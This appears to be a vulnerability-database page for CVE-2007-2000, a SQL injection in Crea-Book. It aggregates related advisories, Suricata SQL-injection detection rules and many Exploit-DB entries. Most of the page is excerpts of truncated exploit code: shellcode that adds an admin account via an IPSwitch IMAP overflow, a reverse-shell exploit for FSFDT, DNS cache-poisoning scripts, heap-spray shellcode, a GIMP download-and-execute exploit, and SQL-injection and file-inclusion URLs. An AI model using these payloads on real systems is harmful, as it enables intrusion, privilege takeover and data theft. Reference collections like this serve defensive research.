CVE-2007-2000
Published: 2007-04-12
Priority: P3 · 42 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.04% (59.6th percentile)
Multiple SQL injection vulnerabilities in admin/admin.php in Crea-Book 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) pseudo or (2) passe parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crea-book | crea-book | <= 1.0 | — |
| raphael_limbach | crea-book | <= 1.0 | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 4.3 MEDIUM
GHSA
GHSA-fgx3-c2gx-wcrm: Multiple SQL injection vulnerabilities in admin/admin
ghsa_unreviewed·2022-05-01
CVE-2007-2000 [HIGH] CWE-89 GHSA-fgx3-c2gx-wcrm: Multiple SQL injection vulnerabilities in admin/admin
Multiple SQL injection vulnerabilities in admin/admin.php in Crea-Book 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) pseudo or (2) passe parameter.
GHSA
GHSA-f8hv-p37q-8vrh: Multiple SQL injection vulnerabilities in Crea-Book 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-2314 [HIGH] GHSA-f8hv-p37q-8vrh: Multiple SQL injection vulnerabilities in Crea-Book 1
Multiple SQL injection vulnerabilities in Crea-Book 1.0, and possibly earlier, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) pseudo or (2) passe parameter to (a) configurer.php, (b) connect.php, (c) delete.php, (d) delete2.php, (e) index.php, (f) infos.php, (g) membres.php, (h) modif-infos.php, (i) modif-message.php, (j) modif.php, (k) uninstall.php, or (l) uninstall_table.php in admin/, different vectors than CVE-2007-2000. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
jasper: crash in jpc_qcx_getcompparms
vendor_redhat·2007-03-01·CVSS 4.3
CVE-2007-2721 [MEDIUM] jasper: crash in jpc_qcx_getcompparms
jasper: crash in jpc_qcx_getcompparms
The jpc_qcx_getcompparms function in jpc/jpc_cs.c for the JasPer JPEG-2000 library (libjasper) before 1.900 allows remote user-assisted attackers to cause a denial of service (crash) and possibly corrupt the heap via malformed image files, as originally demonstrated using imagemagick convert.
Statement: Not vulnerable. This issue did not affect versions of ghostscript as shipped with Red Hat Enterprise Linux 2.1, 3, 4 or 5 as they do not include a bundled JasPer library.
Citrix
CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows
vendor_citrix·2007-01-09·CVSS 6.0
CVE-2007-0108 [MEDIUM] CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows
CVE-2007-0108: nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows remote authenticated users to invoke alternate user profiles.
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004867; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tech
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004866; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004868; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techni
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004863; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Exploit-DB
IPSwitch IMAP Server 9.20 - Remote Buffer Overflow
exploitdb·2009-09-14·CVSS 9.0
CVE-2007-2795 [CRITICAL] IPSwitch IMAP Server 9.20 - Remote Buffer Overflow
IPSwitch IMAP Server 9.20 - Remote Buffer Overflow
---
/* Ipsbitch.cpp vs Ipswitch IMAP
* Tested on: Windows 2000 SP4
* Ref: CVE-2007-2795
*
* Author: Dominic Chell
* Found this half written on a VM so decided to finish it.
*
* Payload adds a local admin account USER=r00t PASS=r00tr00t!!
*
*/
#include "stdafx.h"
#include
#include
#include
#include
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#define usage(){ (void)fprintf(stderr, "Ipsbitch vs Ipswitch IMAP \n\nExample: ipsbitch.exe [ip] [port] [user] [password]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}
// USER=r00t PASS=r00tr00t!!
// Bad Chars = '\x00\x0a\x0d\x0b\x09\x0c\x20'
// Encoded with shikata ga nai
char shellcode[] =
"\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32"
"\x5f\x83\xef
Exploit-DB
Microsoft DirectX SAMI File Parsing - Remote Stack Overflow
exploitdb·2008-01-08·CVSS 8.5
CVE-2007-3901 [HIGH] Microsoft DirectX SAMI File Parsing - Remote Stack Overflow
Microsoft DirectX SAMI File Parsing - Remote Stack Overflow
---
#!/usr/bin/python
##########################################################################
# Bug discovered by Jun Mao of VeriSign iDefense
# https://www.securityfocus.com/bid/26789
# CVE-2007-3901
# Coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
# Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700)
#------------------------------------------------------------------------
# THX TO all the guys at www.offensive-security.com
# EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!!
# I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha
#------------------------------------------------------------------------
##########################################################################
# On Win
Exploit-DB
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
exploitdb·2007-12-21·CVSS 9.0
CVE-2007-3039 [CRITICAL] Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
---
********************** merry christmas Sysadmins *****************************
************** Microsoft Message Queue POC exploit ( MS07-065 ) **************
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com
Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
* Original Advisory:
http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
* Microsoft Bulletin :
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
* CVE Code: CVE-2007-3039
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
* Timeline:
No naked news this time, just rum and whiskey
* Additional information:
From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports fo
Exploit-DB
MRBS 1.2.x - 'view_entry.php' SQL Injection
exploitdb·2007-12-21
CVE-2007-6538 MRBS 1.2.x - 'view_entry.php' SQL Injection
MRBS 1.2.x - 'view_entry.php' SQL Injection
---
source: https://www.securityfocus.com/bid/26977/info
MRBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue was previously documented as a vulnerability in Moodle. Further reports indicate this issue affects MRBS, and the MRBS module for Moodle.
http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007
Exploit-DB
Snitz Forums 2000 - 'Active.asp' SQL Injection
exploitdb·2007-12-03
CVE-2007-6240 Snitz Forums 2000 - 'Active.asp' SQL Injection
Snitz Forums 2000 - 'Active.asp' SQL Injection
---
########################## WwW.BugReport.IR #########################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: A user can gain admin level in snitz 2000 by SQL Injection
# vendor: http://forum.snitz.com/
# Googling: "Powered by Snitz" > 2,440,000 victims
# Last bug report in 2007-02-16 with 4692 visitors
# Exploit: Available
# Fix Available: Update to last version.
######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in "Active.asp"
After login to your VICTIM forum, execute below script
~~~~~~~~~~~Start HTML Exploit~~~~~~~~~
Query:
DefaultValues:
Submit:
~~~~~~~~~~~End HTML Exploit~~~~~~~
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (1)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
$TRXID=$ARGV[0];
$zero=$TRXID>>14;
if ($zero!=0)
{
print "Highest two bits are not 0.\n";
print "Is this really Windows DNS server? check endian issues!\n";
exit(0);
}
$M=($TRXID>>11) & 7;
$C=($TRXID>>3) & 0xFF;
$L=$TRXID & 7;
if (($C % 8)!=7)
{
print "C mod 8 is not 7 - can't predict next TRXID.\n";
print "Wait for C mod 8 to become 7\n";
exit(0);
}
print "Next TRXID is one of the following 8 values:\n";
for ($m=0;$m<8;$
Exploit-DB
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
exploitdb·2007-11-13
CVE-2007-3898 Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
Microsoft Windows Server 2000/2003 - Recursive DNS Spoofing (2)
---
source: https://www.securityfocus.com/bid/25919/info
Microsoft Windows DNS Server is prone to a vulnerability that permits an attacker to spoof responses to DNS requests.
A successful attack will corrupt the DNS cache with attacker-specified content. This may aid in further attacks such as phishing.
#!/usr/bin/perl
use strict;
use Net::DNS;
use Net::DNS::Nameserver;
use IO::Socket;
use Net::RawIP;
sub usage {
print ("$0 is a program for DNS id spoofing.\n");
print ("usage: $0 target tospoof ourzone port\n");
print ("Example: $0 ns1.belbone.be www.hotmail.com .cache-poisoning.net 1025\n");
}
my($target, $tospoof, $ourzone, $query_port) = @ARGV;
$tospoof = "www.hotmail.com" unless($tospoof);
$ourzone = ".cache-poiso
Exploit-DB
Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)
exploitdb·2007-11-11
CVE-2007-2217 Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)
Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)
---
#!/usr/bin/perl
#
# Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)
#
# Author: grabarz
#
# Note: This exploit is modified from Hong Gil-Dong, Jeon Woo-chi PoC
# (http://www.milw0rm.com/exploits/4584)
#
# Internet Explorer has standart ImageBase address and PE Win32 header
# is started at 0x00400000 in memory. So memory cell at the address
# 0x00400008 contains the short value 0x0004 and at the address
# 0x00400011 it contains the long value 0x00000000 in any case.
# I used these addresses for generating of TIFF-file that uses
# vulnerability and for controling of EIP.
#
# This exploit tested on:
# - Windows 2000 SP4 + IE5.01
# - Windows 2000 SP4 + IE5.5
# - Windows 2000 SP4 + IE6.0 SP1
#
# Credit: Hong G
Exploit-DB
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
exploitdb·2007-10-29
CVE-2007-2217 Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
Kodak Image Viewer - TIF/TIFF Code Execution (MS07-055)
---
/* MS07-055 Kodak Image Viewer TIF/TIFF Code Execution Proof Of Concept
by Hong Gil-Dong, Jeon Woo-chi
* Hwang-Hee(?~1542), Prime Minister in Korea
* Once upon a time, One servant of Hwang-Hee was arguing with another
* servant. they asked Hwang-Hee to judge who is right.
* Hwang-Hee listend their story, and said "Both are right".
* We tested this code on Windows 2000 SP4 Korean Edition.
* But if you change some parts of this code, you can also execute an
* arbitrary code in other systems.
* - Caution -
* First, execute the Kodak Image Viewer and then open the ms07-005.tif
* file. If you click the ms07-005.tif file directly in explorer,
* sometimes it causes not excution but just crash.
*/
#include
#define TIF_FILE "ms07-055
Exploit-DB
CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service
exploitdb·2007-10-27
CVE-2007-5082 CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service
CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service
---
#!/usr/bin/perl
#
# *
# * C@@@@@ O@@@@@@@ C@@@@@ O@@@@@@O C@@@@@@@@@o
# * C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@@@@O C@@@@@@@@@@@@@o
# * C@@@@@@o .8@@@@@@. C@@@@@@o 8@@@@@@. @@@@@@O .@@o
# * C@@@@@ @@@@@@c C@@@@@ @@@@@@c C@@@@@c
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: @@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: 8@@@@@
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: :@@@@@@ ::
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: c@@@@@@@Coo8@@@o
# * C@@@@@ O@@@@@: C@@@@@ O@@@@@: C@@@@@@@@@@@@o
# *
# * [0x00001010]
# *
# * Title: CA BrightStor HSM
# * Discovery: iDefense
# * Vulnerability Type: Remote Stack Overflow / DoS
# * Risk: High
# * TCP: 2000
# *
# * This body, this body holding me, be my reminder here that I am not alone.
# *
#
use IO::Socket;
$handshake
Exploit-DB
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
exploitdb·2007-10-04
CVE-2007-5256 FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
---
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
Exploit-DB
Microsoft SQL Server - Distributed Management Objects Buffer Overflow
exploitdb·2007-09-12
CVE-2007-4814 Microsoft SQL Server - Distributed Management Objects Buffer Overflow
Microsoft SQL Server - Distributed Management Objects Buffer Overflow
---
Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
code by rgod http://www.milw0rm.com/exploits/4379
code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim ([email protected])
-->
// Heap Spray
// execute "calc.exe"
shellcode =
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC08
Exploit-DB
Apple QuickTime < 7.2 - SMIL Remote Integer Overflow
exploitdb·2007-09-03·CVSS 9.3
CVE-2007-2394 [CRITICAL] Apple QuickTime < 7.2 - SMIL Remote Integer Overflow
Apple QuickTime < 7.2 - SMIL Remote Integer Overflow
---
<embed
SRC="available-sample.qtif"
QTSRC="poc.smil"
WIDTH="10" HEIGHT="10"
PLUGINSPAGE=" www.apple.com/quicktime/download"
TYPE="video/quicktime"
/>
PROOF OF CONCEPT
#!/usr/bin/perl -w
####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes
####
$file = " poc.smil";
$padd = "x";
$cop_len = 36;
####
# By choosing the following lengths the
# integer overflow will be triggered.
####
$tit_len = 223;
$auth_len = 65280;
open(FH,">$file") or die "Can't open file:$!";
print FH
"\n".
"\n".
" \n".
" \n".
" \n".
"\n".
"";
close(FH);
# milw0rm.com [2007-09-03]
Exploit-DB
Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow
exploitdb·2007-07-20
CVE-2007-1675 Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow
Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow
---
###########################################################################################
# Lotus Domino IMAP4 Server Release 6.5.4 / Windows 2000 Advanced Server x86 Remote Exploit
###########################################################################################
# Vulnerable: IBM Lotus Domino & prdelka
#
# Exploitation steps:
# 1) The instruction "call dword [ecx]" is performed with user supplied ECX
# 2) EAX reference our buffer from retaddr onward
# 3) we put pointer in ECX to a pointer referencing "call eax"
# 4) a small payload decrements eax and then jmp's into the eax buffer due
# to size limitations.
# 5) our larger payload is then executed.
#
# muts exploit would not work for us, his egghunt uses 0x2e which
Exploit-DB
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
exploitdb·2007-07-10
CVE-2007-3681 WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
WinPcap 4.0 - 'NPF.SYS' Local Privilege Escalation
---
/*
WinPcap NPF.SYS Privilege Elevation Vulnerability PoC exploit
Affected software:
(*) WinPcap versions affected (Confirmed)
- WinPcap 4.0 and previous
(*) WinPcap fixed version (stable) : WinPcap 4.0.1
Note : There was an error in the previous advisory, which tells WinPcap
4.1 is affected, in fact WinPcap 4.1 is the beta version.
(*) Operating systems affected (Confirmed)
- Windows 2000 SP4 (Both server and workstation)
- Windows XP SP2
- Windows 2003 Server
- Windows Vista !!
Description:
It's a well known issue that WinPcap security model allows non-administrator
users to use its device driver. If they don't manually unload it after using
tools such as Wireshark (ethereal), which unfortunatelly oftenly happens, this
can
Exploit-DB
SAP DB 7.4 - WebTools Remote Overwrite (SEH)
exploitdb·2007-07-07
CVE-2007-3614 SAP DB 7.4 - WebTools Remote Overwrite (SEH)
SAP DB 7.4 - WebTools Remote Overwrite (SEH)
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : SAP DB 7.4 WebTools
* Site : http://www.sapdb.org
* Found by : NGSSoftware Insight Security Research
* ----------------------------------------
* Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit
* Exploit date : 07.07.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 ALL SP
* Crew : Dreatica-FXP
* ----------------------------------------
* Info : This is the SEH overwrite realization of the vulnerability found by
* NGSSoftware Insight Security Research, it is trivial. We send a big amount
* of bytes to server (about 20000) and overwrite SEH. Aproximatly at the 9900
* byte we trigger an exception and our shellcode is executed.
* -
Exploit-DB
Microsoft Excel 2000/2003 - Sheet Name (PoC)
exploitdb·2007-06-27
CVE-2007-3490 Microsoft Excel 2000/2003 - Sheet Name (PoC)
Microsoft Excel 2000/2003 - Sheet Name (PoC)
---
Vuln Exposed by: ZhenHan.Liu
Team: Ph4nt0m Security Team
http://www.ph4nt0m.org
Tested on: Full Patched Excel 2003 Sp2, CN
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4121.zip (06272007-2670.zip)
# milw0rm.com [2007-06-27]
Exploit-DB
WebIf - 'OutConfig' Local File Inclusion
exploitdb·2007-06-18
CVE-2007-3266 WebIf - 'OutConfig' Local File Inclusion
WebIf - 'OutConfig' Local File Inclusion
---
source: https://www.securityfocus.com/bid/24516/info
WebIf is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue
Exploit-DB
LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)
exploitdb·2007-05-30
CVE-2007-2980 LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)
LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow (PoC)
---
2007/05/27
LeadTools Raster ISIS Object (LTRIS14e.DLL v. 14.5.0.44) Remote Buffer Overflow Exploit
url: http://www.leadtools.com/
price: eheheh, take a look at thier site :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
buff = String(2000, "A")
test.DriverName = buff
here is a dump:
EAX 41414141
ECX 41414141
EDX 008CC338 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBX 008C0000
ESP 0348F994
EBP 0348FBB4
ESI 008CC330 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EDI 00000012
EIP 7C92142E ntdll.7C92142E
7C92
Exploit-DB
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
exploitdb·2007-05-23
CVE-2007-2903 Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service
---
2007/05/23
Microsoft Office 2000 Controllo UA di Microsoft Office (OUACTRL.OCX v. 1.0.1.9) "HelpPopup" method Remote Buffer Overflow
and winhlp32.exe Denial of Service (hey, don't you think this is a very long title :)
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
control is set as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Sub tryMe()
buff = String(1000, "a")
test.HelpPopup buff, "default"
End Sub
Registers content:
EAX 00000000
ECX 7E39EC0C USER32.7E39EC0C
EDX 7C91EB94 ntdll.KiFastSystemCallRet
EBX 38CFD2D0 OUACTRL.38CFD2D0
ESP 01D0F434 UNICODE "aaaa..."
EBP 00610061
ESI 02ACC86C
EDI 00000000
EIP 00610061
# milw0rm.com [2007-05-23]
Exploit-DB
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
exploitdb·2007-05-14
CVE-2007-2648 Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
---
2007/05/14
Clever Database Comparer ActiveX version 2.2 Remote Buffer Overflow Exploit
url: http://www.clevercomponents.com/home/news.asp
price: from $49.99 to $149.19
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to these exploits.
Sub tryMe
buff = String(2000,"A")
test.ConnectToDatabase buff,"default", "default", "default", "default"
End Sub
faultmon dump:
12:58:35.492 pid=0570 tid=07FC EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
EAX=01D04141: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=41418282: ?? ??
Exploit-DB
GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
exploitdb·2007-05-09
CVE-2007-2356 GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
---
/*
:: Kristian Hermansen ::
Date: 20070509
Description: Gimp 2.2.14 RAS vuln, thanks to Marsu. This one is universal
download and exec using call esp in libgimpcolor-2.0-0.dll.
Vulnerable: Gimp 2.2.14
Tested: Gimp 2.2.14 on Windows Vista, XP, 2000
Compile: gcc -o netsniper-gimpu netsniper-gimpu.c
Usage: ./netsniper-gimpu http://tinyurl.com/32h99k ubuntu.ras
*/
#include
#include
#include
char RAS[]=
"\x59\xa6\x6a\x95\x00\x00\x01\xfd\x00\x00\x01\xb6\x00\x00\x00\x08"
"\x00\x03\x68\x94\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x03\x29"
"\x1b\xff\xbc\xef\x73\xd9\x13\x00\x70\xf0\xcc\x8d\x99\x50\xf1\xf7"
"\xac\x4d\xf0\xab\xe0\xec\xef\x2e\xe5\x8c\xef\xa6\x33\x8c\xc6\xfa"
"\xfe\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
Exploit-DB
Linksys SPA941 - Remote Reboot (Denial of Service)
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - Remote Reboot (Denial of Service)
Linksys SPA941 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 " unless ($ARGV[2]);
die "Usage $0 " unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
